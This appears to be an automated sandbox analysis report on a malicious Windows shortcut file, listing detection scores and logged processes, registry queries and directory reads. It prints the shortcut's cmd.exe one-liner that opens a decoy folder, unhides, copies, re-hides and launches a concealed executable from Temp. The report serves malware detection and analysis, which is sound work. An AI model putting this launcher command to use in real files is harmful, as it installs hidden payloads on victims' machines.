Click to jump to signature section
Source: shortcut.lnk | ReversingLabs: Detection: 69% |
Source: shortcut.lnk | Virustotal: Detection: 72% | Perma Link |
Source: shortcut.lnk | ReversingLabs: Detection: 69% |
Source: shortcut.lnk | Virustotal: Detection: 72% |
Source: C:\Windows\explorer.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: classification engine | Classification label: mal72.winLNK@11/0@0/0 |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\windows\system32\cmd.exe" /c "C:\Windows\explorer.exe %cd%.DataStorage & attrib -s -h %cd%dBuXlYk.exe & xcopy /F /S /Q /H /R /Y %cd%dBuXlYk.exe C:\Users\user\AppData\Local\Temp\zHyIh\ & attrib +s +h %cd%dBuXlYk.exe & start C:\Users\user\AppData\Local\Temp\zHyIh\dBuXlYk.exe & exit | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe C:\Users\user\Desktop.DataStorage | |
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -s -h C:\Users\user\DesktopdBuXlYk.exe | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\xcopy.exe xcopy /F /S /Q /H /R /Y C:\Users\user\DesktopdBuXlYk.exe C:\Users\user\AppData\Local\Temp\zHyIh\ | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\DesktopdBuXlYk.exe | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe C:\Users\user\Desktop.DataStorage | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -s -h C:\Users\user\DesktopdBuXlYk.exe | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\xcopy.exe xcopy /F /S /Q /H /R /Y C:\Users\user\DesktopdBuXlYk.exe C:\Users\user\AppData\Local\Temp\zHyIh\ | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\DesktopdBuXlYk.exe | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe | |
Source: unknown | Process created: C:\Windows\explorer.exe | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | File read: C:\Users\desktop.ini | Jump to behavior |
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 | Jump to behavior |
Source: C:\Windows\explorer.exe | File opened: C:\Windows\SYSTEM32\MsftEdit.dll | Jump to behavior |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: LNK file | Process created: C:\Windows\System32\cmd.exe |
Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe | |
Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe | |
Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 351 | Jump to behavior |
Source: explorer.exe, 00000003.00000002.569217783.00000000061BC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: unknown | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c "c:\windows\explorer.exe %cd%.datastorage & attrib -s -h %cd%dbuxlyk.exe & xcopy /f /s /q /h /r /y %cd%dbuxlyk.exe c:\users\user\appdata\local\temp\zhyih\ & attrib +s +h %cd%dbuxlyk.exe & start c:\users\user\appdata\local\temp\zhyih\dbuxlyk.exe & exit |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe C:\Users\user\Desktop.DataStorage | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -s -h C:\Users\user\DesktopdBuXlYk.exe | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\xcopy.exe xcopy /F /S /Q /H /R /Y C:\Users\user\DesktopdBuXlYk.exe C:\Users\user\AppData\Local\Temp\zHyIh\ | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\DesktopdBuXlYk.exe | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\Documents | Jump to behavior |
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\Documents | Jump to behavior |
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\Documents | Jump to behavior |
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\Documents | Jump to behavior |
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\Documents | Jump to behavior |
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\Documents | Jump to behavior |
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\Documents | Jump to behavior |